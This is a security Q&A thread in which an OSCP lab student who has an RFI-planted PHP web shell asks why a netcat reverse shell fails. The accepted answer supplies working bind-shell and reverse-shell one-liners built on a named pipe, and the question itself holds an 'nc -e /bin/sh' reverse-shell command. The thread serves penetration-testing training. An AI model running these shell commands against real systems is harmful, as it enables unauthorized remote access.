# Can't get a reverse shell

Tags: network, metasploit, reverse-shell

I'm doing my OSCP certification. On one of the lab machines, I'm having a  really hard time getting a reverse shell.

I scanned the machine and found port 80 open. I enumerated even more and found a RFI.
I uploaded a php web shell and it worked, command is running as apache user. Then I enumerated more and found netcat on the machine.

Now I want to have a shell to my attacking box. I tried using netcat as a reverse/bind shell and get nothing.

I tried different ports and nothing is working. When I scan with nmap ports like 6666, 4444, 5555 they are all filtered.

What am I doing wrong?

Comment: Doesn't this fall behind the *"Try harder"* motto?

Comment: im trying harder for tow days

Comment: what is the netcat command you're using to get the shell?

Comment: Try to get the output of nc -h and check if it has a -e option. Most nc's don't. Then you need to find another way.

Comment: @kaidentity for reverse shell: nc -nv [my ip add] 4444 -e /bin/sh in my kali im listeining with nc -lvp 4444 i can't get the output i treid it i just dont get anything :\

Comment: That is what I was suspecting. Most ncs in the OffSec lab (like most ncs in popular linux distros) don't support -e. It simply doesn't exist. Check out my answer (follows in a second).

Comment: Keep things simple. Check what other users are able to access the system. Perhaps they have sudo rights.

Comment: @ShaiAlfasi 2 days is nothing. You need to try harder. What you've done wrong is to discuss the details of the lab outside the lab environment. When I took the OSCP, this would have violated your terms.

Answer (score 10):

Most ncs in the OffSec lab (like most ncs in popular linux distros) don't support -e. It simply doesn't exist.
The solution is to redirect the stdin/stdout communication through a pipe:

```
cd /tmp
mknod mypipe p
/bin/bash 0< /tmp/mypipe | nc -nlvp 4444 1> /tmp/mypipe
```

for a bind shell or

```
/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe
```

for a reverse shell. [Here is a full article](https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem) about this.

Recently I found another nc on a Ubuntu 10.04 system where the above nc listener wouldn't have worked since nc didn't allow -l and p simultanously. So before panicking because the shell doesn't work you should first try to get the nc help or try to play with the various options (I tend to specify a lot of flags, maybe one should aim for as little as possible).

Comment: ho i feel so stupid i already read that but i ignord that, it works! thank you a lot !

Comment: Wow nice! I have seen this once before, but I didn't know why they were using backpipes. Well explained. I am going to try for my OSCP later this year so this is great to know. The only thing I would ask is please paste some of the content over into your answer from that article so as to keep in line with the stack exchange answer quality policies